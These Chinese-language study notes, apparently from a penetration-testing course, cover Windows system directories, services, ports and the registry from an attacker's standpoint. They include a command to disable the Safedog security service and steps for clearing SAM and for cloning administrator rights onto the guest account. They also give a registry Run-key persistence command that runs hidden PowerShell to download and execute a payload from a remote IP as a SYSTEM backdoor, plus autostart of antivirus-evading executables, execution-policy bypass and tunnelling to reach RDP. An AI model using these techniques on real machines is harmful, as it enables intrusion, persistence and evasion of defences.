0x08.系统目录、服务、端口、注册表

系统目录

• C:\Windows\System32这个目录很重要

• C:\Windows\System32\config\SAM

  计算机的账号密码由sam记录，清空sam就不需要账号密码，直接登录。实战中先进PE复制一份初始的sam，然后再清空，清空后进入系统，操作完之后，再把原始的sam粘贴回去

• C:\Windows\System32\drivers\etc\hosts

• C:\Users

  创建用户之后，会在该文件夹下留下配置信息，而且删不掉，所以尽量不要去创建

​ 用管理员的账号密码去登录，访问桌面，会得到更多信息。

• C:\Users\Administrator\Documents

  可能会有日常文件

• C:\ProgramData

  c盘下的隐藏文件，因为里面的文件是开机自启动。病毒经常感染这个文件，杀毒时重点杀这个文件

服务

• 本地服务：在这台计算机上进行启动的一些服务
• 网络服务：IIS、DNS、SAM、SMB、FTP等都能通过网络ip访问

• 查看所有启动服务：net start

• 服务的启动和停止

​ win+r，输入services.msc，打开服务。操作的是服务名称，不是显示名称

​ 比如对服务进行停止，如果使用显示名称，需要加双引号

net stop "服务显示名称"
net stop 服务名称
net start 显示的是服务显示名称，需要将里面的用双引号包裹

• 安全狗绕过思路

  先将安全狗的服务禁用掉，然后再重启计算机。

  禁用命令：sc config "safedog center guarder" start= disable，这里的服务要写服务名称，不能写服务显示名称，start=后面要加空格

  
  

端口

• 区分服务
• 端口不能重复使用
  • 也有复用的情况：目标内网80端口映射到公网的80，且开启了3389，但是不出网。这时候可以将3389加在80上，这样就能通过公网访问到
• 范围：1-65535，1-1024分给了系统自带的服务
• 木马一般使用高位端口

目标情况：内网的80端口映射到了公网的80，并且开启了3389，但是不出网

方案一：端口复用

将3389端口加在80上，这样就能通过公网访问到。需要用到端口复用的工具，可能会不兼容

方案二：http隧道

本地生成好隧道，把马上传到目标服务器上，然后通过公网ip连接马。走的是80端口和马建立的隧道，通过隧道连接内网的3389

• 常见端口

  HTTP----->80
  HTTPS----->443
  FTP----->20,21
  SSh----->22
  telnet----->23
  SMTP----->25
  SMB----->445
  RDP----->3389
  QQ----->1080
  tomcat----->8080
  mysql----->3306
  sqlserver----->1433
  oracle----->1521
  redis----->6379
  

注册表

系统的识别是通过注册表的值进行调用，或者UID号。windows的管理员UID是500，LINUX的管理员UID号是0

1.HKEY_CLASSES_ROOT
• 管理文件系统。根据在 Windows 中安装的应用程序的扩展名 , 该根键指明其文件类型的名称，相应打开该文件所要
调用的程序等等信息。
2.HKEY_CURRENT_USER
管理系统当前的用户信息。在这个根键中保存了本地计算机中存放的当前登录的用户信息 , 包括用户登录用户名
和暂存的密码。在用户登录 Windows 98 时，其信息从 HKEY_USERS 中相应的项拷贝到 HKEY_CURRENT_USER 中。
3.HKEY_LOCAL_MACHINE
• 管理当前系统硬件配置。在根键这个中保存了本地计算机硬件配置数据 , 此根键下的子关键字包括在 SYSTEM.DAT 中 ,
用来提供 HKEY_LOCAL_MACHINE 所需的信息 , 或者在远程计算机中可访问的一组键中。
• 这个根键里面的许多子键与 System.ini 文件中设置项类似。
4.HKEY_USERS
• 管理系统的用户信息。在这个根键中保存了存放在本地计算机口令列表中的用户标识和密码列表。同时每个用户的预
配置信息都存储在 HKEY_USERS 根键中。 HKEY_USERS 是远程计算机中访问的根键之一。
5.HKEY_CURRENT_CONFIG
• 管理当前用户的系统配置。在这个根键中保存着定义当前用户桌面配置 ( 如显示器等等 ) 的数据 , 该用户使用过的文档
列表（ MRU ），应用程序配置和其他有关当前用户的 Windows 98 中文版的安装的信息。

注册表的使用

• 隐藏后门

• 克隆账号密码权限

  输入regedit，打开注册表，一开始SAM表没有读取权限，对二级目录的sam进行权限修改

将管理员的权限进行修改，给管理员完全控制权限，修改成完全控制，重新打开

01F4对应的是管理员，01F5对应的是普通用户

思路是将管理员的F值替换到普通用户的F值中，这个时候guest就有了管理员权限

操作完之后要把权限恢复

• 读取服务密码

• 查询开机启动程序

  • 第一种思路

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run这里是开机自启动项，如果exe能过免杀，可以在这里添加一个字符串值

• 第二种思路

  使用下面的cmd命令，执行完之后，并不会出现在 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run里面，而是在HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v
"Key1names" /t REG_SZ /d "cmd /c start powershell.exe -nop -w hidden -c \ "IEX((new-object
net.webclient).downloadstring('http://192.168.187.128:80/a'))\""/f
远程从192.168.187.128下载，system权限的后门

或者
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v
"Key1names" /t REG_SZ /d "cmd /c start c:\windows\system32\keysx.exe" /f
只要这个exe能免杀，将它添加到了开机自启动项

• 第三种思路，开始---->启动，也会开机自启动

远程桌面

这个操作能直接将自己的文件粘贴到对方的电脑里面，但是会将自己的磁盘映射到对方的电脑上。如果对方是蜜罐的话，这个操作很危险。建议使用虚拟机

• 计算机属性，勾选第二个

• 使用2012连接08的，勾选驱动器

• 可以直接将12的文件粘贴到08上

• 12的磁盘会映射到08上，非常危险

• 08的3389会连接到12上

绕过

执行命令可能会有一些截断的问题，将它保存成批处理的文件

bypass执行:powershell -exec bypass .\b.psl